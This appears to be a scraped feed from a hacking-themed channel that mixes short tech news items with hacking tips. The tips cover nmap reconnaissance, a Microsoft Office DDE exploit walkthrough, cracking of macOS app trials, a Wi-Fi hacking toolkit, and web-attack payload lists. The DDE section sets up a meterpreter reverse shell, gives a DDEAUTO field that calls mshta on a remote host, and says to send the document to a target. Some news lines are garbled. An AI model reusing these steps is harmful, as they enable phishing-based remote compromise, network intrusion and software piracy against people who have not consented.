Next year, TSMC and other vendors will support PS5 production or surpass 18 million next year.
#Technologies

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Recon nmap and windows Hacking commands :
#Commnands :


# Enumerate subnet
nmap -sn 10.10.10.1/24

# Fast simple scan
nmap -sS 10.10.10.1/24
export IP=10.10.10.11

# Extracting Live IPs from Nmap Scan
nmap 10.1.1.1 --open -oG scan-results; cat scan-results | grep "/open" | cut -d " " -f 2 > exposed-services-ips

# Full complete slow scan with output
nmap -v -sT -A -T4 -p- -Pn --script vuln -oA full $IP

# Autorecon
python3 autorecon.py $IP

# Scan for UDP
nmap $IP -sU
unicornscan -mU -v -I $IP

# Connect to udp if one is open
nc -u $IP 48772

# Responder
responder -I eth0 -A

# Amass
amass enum $IP

# Generating nice scan report

nmap -sV IP_ADDRESS -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html"
#Simple Port Knocking
for x in 7000 8000 9000; do nmap -Pn –host_timeout 201 –max-retries 0 -p $x 1.1.1.1; done
File enumeration :
Common :

# Check real file type
file file.xxx

# Analyze strings
strings file.xxx
strings -a -n 15 file.xxx # Check the entire file and outputs strings longer than 15 chars

# Check embedded files
binwalk file.xxx # Check
binwalk -e file.xxx # Extract

# Check as binary file in hex
ghex file.xxx

# Check metadata
exiftool file.xxx

# Stego tool for multiple formats
wget https://embeddedsw.net/zip/OpenPuff_release.zip
unzip OpenPuff_release.zip -d ./OpenPuff
wine OpenPuff/OpenPuff_release/OpenPuff.exe
Disk files

# guestmount can mount any kind of disk file
sudo apt-get install libguestfs-tools
guestmount --add yourVirtualDisk.vhdx --inspector --ro /mnt/anydirectory

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

The recent patent from Apple confirms that potential MacBooks can be fitted with view keyboards.
#Technologies

Vodafone: here are the interesting end-of-year offers.
#Updates

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Windows Penetration Testing Using Microsoft Office DDE Exploit (MACROLESS) :

1) DDE exploitation was also known as dynamic data exchange, it allows data to be transferred between applications without any user interaction.

Hackers have used this technique to execute malicious scripts to compromise data.

This was reported to Microsoft by Sensepost, Etienne Stalmans and Saif El-Sherei, but this has not been fixed as many applications use the DDE protocol.

This exploit does not require a macro feature to be enabled.

Prerequisites - DDE exploit
Windows machine
Microsoft Office (any version)
Kali Linux
We will have to import the Metasploit exploit.

Download it from GitHub using the terminal command:

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
Move the script to the Metasploit location

mv dde_delivery.rb / usr / share / metasploit-framework / modules / exploits / windows /

2) Now enter msfconsole in the terminal that starts the Metasploit framework and enter reload_all to load modules.

3) use exploit/windows/dde_deliverythen set the sever host using the following command

set SRVHOST 192.168.177.141
we need to set up a payload listener.
Do not use port 8080 as the default server port is set to 8080

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.177.141
set LPORT 6708
exploit

4) Now copy and paste the code into any text document.
We used Office 365 Pro Plus, completely revamped.
Find the formula and you should have a small error window in your document, then right click on the toggle code.
Paste the command into the document in parentheses.
Save your document.

{DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe “http://192.168.177.141:8080/mVg3YDU3gVQ”}

5) Send the document to the suspect and a counter session will open.

(don't copy our tips)

¯ \ _ (ツ) _ / ¯
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Free delivery of monitoring software for malicious activity in US CISA, Azure and MS 365
#Malwares

A year went by with MacOS, which said there were more risks than Windows.
#Malwares

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑MacOS Apps Hacks :

This hack doesn't work on systems with SIP (System Integrity Protection) enabled, and it's enabled by default since El Capitan. It can be easily disabled from Recovery Mode but it's another layer of security which is always good to have so disabling it permanently is not the wisest idea. I'll implement some solution to bypass this restriction when I have time.


» Things 3 Trial :

Bear bear-pro

Sketch sketch-trial

VPN Master vpn-master-vip


🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

open term and type :

1) git clone https://github.com/gebeto/macos-hacks

2) cd macos-hacks

3) cd <APPLICATION>

4) make

5) You can use run.sh, it's a wrapper script that sets necessary environment variables to insert the lib and launches Applications (it assumes that installed to /Applications, edit the script if it differs for you).

enjoy :)
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Foreign media: A separate promotional deal was signed by Google & Facebook, suspected of unfair price theft.
#International

Hedge funds show that Intel is considering a strategic sale, with the share price of the latter increasing by 5%
#International

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑wIFI HACK ALL IN ONE FOR TERMUX :


🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

$ git clone https://github.com/mkdirlove/WI-TOOLKIT

$ cd WI-TOOLKIT

$ chmod +x *

$ ./install.sh

$ sudo python wi-toolkit.py

or

$ sudo python2 wi-toolkit.py

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Amazon launches India's "Future Engineer" initiative for computer science education.
#International

After causing an 18-year-old Russian man to freeze to death, Google Maps announces improvements to navigation routes.
#Updates

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A free real collection of Burpsuite Intruder payloads

> BurpBounty payloads, fuzz list

> malicious file uploads

> web pentesting methodologies and checklists.

Spiders, Robots and Crawlers IG-001
Search Engine Discovery/Reconnaissance IG-002
Identify application entry points IG-003
Testing for Web Application Fingerprint IG-004
Application Discovery IG-005
Analysis of Error Codes IG-006
SSL/TLS Testing (SSL Version, Algorithms, Key length, Digital Cert. Validity) - SSL Weakness CM‐001
DB Listener Testing - DB Listener weak CM‐002
Infrastructure Configuration Management Testing - Infrastructure Configuration management weakness CM‐003
Application Configuration Management Testing - Application Configuration management weakness CM‐004
Testing for File Extensions Handling - File extensions handling CM‐005
Old, backup and unreferenced files - Old, backup and unreferenced files CM‐006
Infrastructure and Application Admin Interfaces - Access to Admin interfaces CM‐007
Testing for HTTP Methods and XST - HTTP Methods enabled, XST permitted, HTTP Verb CM‐008
Credentials transport over an encrypted channel - Credentials transport over an encrypted channel AT-001
Testing for user enumeration - User enumeration AT-002
Testing for Guessable (Dictionary) User Account - Guessable user account AT-003
Brute Force Testing - Credentials Brute forcing AT-004
Testing for bypassing authentication schema - Bypassing authentication schema AT-005
Testing for vulnerable remember password and pwd reset - Vulnerable remember password, weak pwd reset AT-006
Testing for Logout and Browser Cache Management - - Logout function not properly implemented, browser cache weakness AT-007
Testing for CAPTCHA - Weak Captcha implementation AT-008
Testing Multiple Factors Authentication - Weak Multiple Factors Authentication AT-009
Testing for Race Conditions - Race Conditions vulnerability AT-010
Testing for Session Management Schema - Bypassing Session Management Schema, Weak Session Token SM-001
Testing for Cookies attributes - Cookies are set not ‘HTTP Only’, ‘Secure’, and no time validity SM-002
Testing for Session Fixation - Session Fixation SM-003
Testing for Exposed Session Variables - Exposed sensitive session variables SM-004
Testing for CSRF - CSRF SM-005
Testing for Path Traversal - Path Traversal AZ-001
Testing for bypassing authorization schema - Bypassing authorization schema AZ-002
Testing for Privilege Escalation - Privilege Escalation AZ-003
Testing for Business Logic - Bypassable business logic BL-001
Testing for Reflected Cross Site Scripting - Reflected XSS DV-001
Testing for Stored Cross Site Scripting - Stored XSS DV-002
Testing for DOM based Cross Site Scripting - DOM XSS DV-003
Testing for Cross Site Flashing - Cross Site Flashing DV-004
SQL Injection - SQL Injection DV-005
LDAP Injection - LDAP Injection DV-006
ORM Injection - ORM Injection DV-007
XML Injection - XML Injection DV-008
SSI Injection - SSI Injection DV-009
XPath Injection - XPath Injection DV-010
IMAP/SMTP Injection - IMAP/SMTP Injection DV-011
Code Injection - Code Injection DV-012
OS Commanding - OS Commanding DV-013
Buffer overflow - Buffer overflow DV-014
Incubated vulnerability - Incubated vulnerability DV-015
Testing for HTTP Splitting/Smuggling - HTTP Splitting, Smuggling DV-016
Testing for SQL Wildcard Attacks - SQL Wildcard vulnerability DS-001
Locking Customer Accounts - Locking Customer Accounts DS-002
Testing for DoS Buffer Overflows - Buffer Overflows DS-003
User Specified Object Allocation - User Specified Object Allocation DS-004
User Input as a Loop Counter - User Input as a Loop Counter DS-005
Writing User Provided Data to Disk - Writing User Provided Data to Disk DS-006
Failure to Release Resources - Failure to Release Resources DS-007
Storing too Much Data in Session - Storing too Much Data in Session DS-008
WS Information Gathering - N.A. WS-001
Testing WSDL - WSDL Weakness WS-002
FREE :

https://github.com/1N3/IntruderPayloads
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

The explanation for the failure of the deal to sell the bank to Yandex was discovered by Tinkov. The $200 million he was underpaid.
#International

A journalist uses a zoom to penetrate a "secret" European meeting of Defense Ministers.
#International

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Local DNS caching any linux :

1. apt-get install dnsmasq
2. configure
This will tune dnsmasq to standalone mode, not sort of
plugin of NetworkManager.

vim /etc/dnsmasq.conf
+ resolv-file=/etc/???upstream-of-dnsmasq.conf
+ listen..
+ port
+ ...
vim /etc/???upstream-of-dnsmasq.conf
+ nameserver 8.8.8.8
+ nameserver 8.8.4.4
+ nameserver 2001:4860:4860::8888

vim /etc/resolv.conf
ONLY THESE TWO LINE
nameserver 127.0.0.1
nameserver ::1

3. service ... start OR systemctl ... start ..

HINT
WHAT if dnsmasq faild to start ?
/sbin/dnsmasq --test
then check the error message.

Ref: apach
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁